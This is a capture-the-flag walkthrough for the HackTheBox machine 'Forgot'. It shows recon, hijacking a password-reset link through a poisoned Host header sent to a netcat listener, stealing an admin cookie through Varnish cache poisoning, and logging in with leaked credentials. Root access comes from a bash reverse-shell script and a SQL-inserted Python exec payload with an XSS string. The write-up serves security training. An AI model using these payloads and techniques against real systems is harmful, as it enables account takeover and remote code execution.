Forgot

Forgot is a medium rated difficulty Linux machine from HackTheBox created by MrR3boot. This box is pretty confusing and it’s pretty slow, you need a lot of patience to complete this one. In the current post my IP is 10.10.14.18 and the target’s IP is 10.129.228.104.

Gathering Information

This step is always the same, you must ping the machine to see if is alive, and then use Nmap to scan all the ports to avoid surprises.

Local Terminal

nmap -p- --open -T5 -v -n 10.129.228.104

Nmap’s output, just a website?

Local Terminal

nmap -sC -sV -p 22,80 10.129.228.104

It’s just a website, but there is something weird about it.

Local Terminal

whatweb http://10.129.228.104

Relevant information: Varnish 6.2, after exploring you should search about that.

• Browser: http://10.129.228.104

Main page

Fragment of the main page source code (CTRL+U)

Add more information to your notes {user : robert-dev-14522}, still, we don’t have much information, so our best option is to fuzz the website and try to obtain more.

Local Terminal

wfuzz -c -t 200 –hc=404 -w /usr/share/wordlists/dirb/big.txt http://10.129.228.104/FUZZ

home, tickets, and reset. Interesting.

My target machine explodes, new target IP: 10.129.219.117

• Browser: http://10.129.219.117/forgot

We can see that the website sends something to the user, we need to intercept it, by using one terminal, Burpsuite, and your browser.

User Interception Step

Before, from http://10.129.219.117 take the username of “robert-dev” using view:source (CTRL+U) or try curl http://10.129.219.117/ | grep “Q1 release fix by”

Local Terminal

nc -lvnp  443

• Burpsuite: {INCERCEPT ON}

• Browser: {username: robert-dev-14522} {PRESS RESET}

• Burpsuite: Change host to your IP address and netcat port, like 10.10.14.18:443

Burpsuite modification

• Burpsuite: {Press Forward}

• Burpsuite: {Intercept OFF}

Wait around 1-2 minutes. at netcat you will receive this. Copy the token url.

• Browser: http://10.129.219.117/reset?token=iATub9koGT1P79mowK2i%2B7zoJgnmsxWu1Fo4jWi0gPv8laTB3SzWbEPr8Om53r7Gcqt1Mu6U%2Bh4XqhSp7HoJ8A%3D%3D

Change password to anything (Here: pass123)

Now we have to login.

• Browser: http://10.129.219.117

Home Portal

This machine have a timer where it changes the username of “robert-dev”, and it will fail if you are slow. Repeat everything from “User Interception Step”

http://10.129.219.117/tickets

http://10.129.219.117/escalation

Login through SSH

This version of Varnish have an issue with the cache (this was hard to find), we will use it to intercept and get the credentials to login directly to the machine.

view:source of home, /admin_tickets sounds like an important subdomain

First, we need to submit a ticket to a valid important URL from the machine plus a fictional directory, and the best place is static, where the .JS files are saved. After this, we will get the admin’s cookie to go to /admin_tickets

• Browser: http://10.129.219.117/escalation

Submit!

Here you have to wait around two or three minutes, If you want now, you can retrieve your user cookie to compare, by using Burpsuite, intercepting a site like http://10.129.219.117/escalation while logged in.

And after waiting, we can get the cookie from the fictional page

Local Terminal

curl -I http://10.129.219.117/static/directory

Admin cookie, if this fails, repeats by summiting a new ticket with a new folder

Now that we have the administrator’s cookie, we have to use Burpsuite to change the cookie when going to /admin_tickets

• Burpsuite {Intercept ON}

• Browser: http://10.129.219.117/admin_tickets

• Burpsuite {Replace Cookie}

• Burpsuite {Forward}

• Burpsuite {Intercept OFF}

And we are in! Look, there is an ssh issue

We have to try to login using these credentials, but before we notice that this website loves to add an Uppercase everywhere… so we are going to get the information from the source

view:source of /admin_tickets… {diego:dCb#1!x0%gjq}

Local Terminal

ssh diego@10.129.219.117                     #password: dCb#1!x0%gjq

Now our LocalTerminal [Term] is the Target Terminal [Diego]

Get the user.txt

Privilege Escalation

Now we want to become root, first we need to know what applications we can execute as root.

Target Terminal Diego

sudo -l

Target Terminal Diego

cat /opt/security/ml_security.py

By exploring the code, we found two things, it reads a MySQL data base, and by the version of TensorFlow, we can inject code in saved_model_cli to execute another bash file. I found an explanation and steps from this post.

It’s connected to SQL! Nice.

Target Terminal Diego

mysql -u diego -p          #pass: dCb#1!x0%gjq

Target Terminal Diego (SQL)

SHOW DATABASE;
use app;
show tables;
SELECT * from users;

app's Tables

Content of users table

Still, I couldn’t do anything else with this information…

Target Terminal Diego

cd /dev/shm
vi script.sh

Content of script.sh

#!/bin/bash

bash -i >& /dev/tcp/10.10.14.18/443 0>&1

Target Terminal Diego

chmod 777 script.sh
mysql -u diego -p                 #pass: dCb#1!x0%gjq

From here, we need three terminal, two connected to the target as Diego, one to use the MySQL queries [MySQL], the other one to execute ml_security.py [Diego], and one Local Terminal [Term]

Target Terminal [MySQL]

use app;
insert into escalate values (“TEXT”,”TEXT”,”TEXT”,’hello=exec(“””\nimport os\nos.system(“/dev/shm/script.sh”)\nprint(“&ErrMsg=%3Cimg%20src=%22http://imgur.com/bTkSe.png%22%20/%3E%3CSCRIPT%3Ealert%28%22xss%22%29%3C/SCRIPT%3E”)”””)’);

Local Terminal [Term]

nc -nlvp 443

Target Terminal [Diego]

sudo /opt/security/ml_security.py

Now [Term] is [Root]

Target Root

cd /root
ls
cat root.txt

Root flag!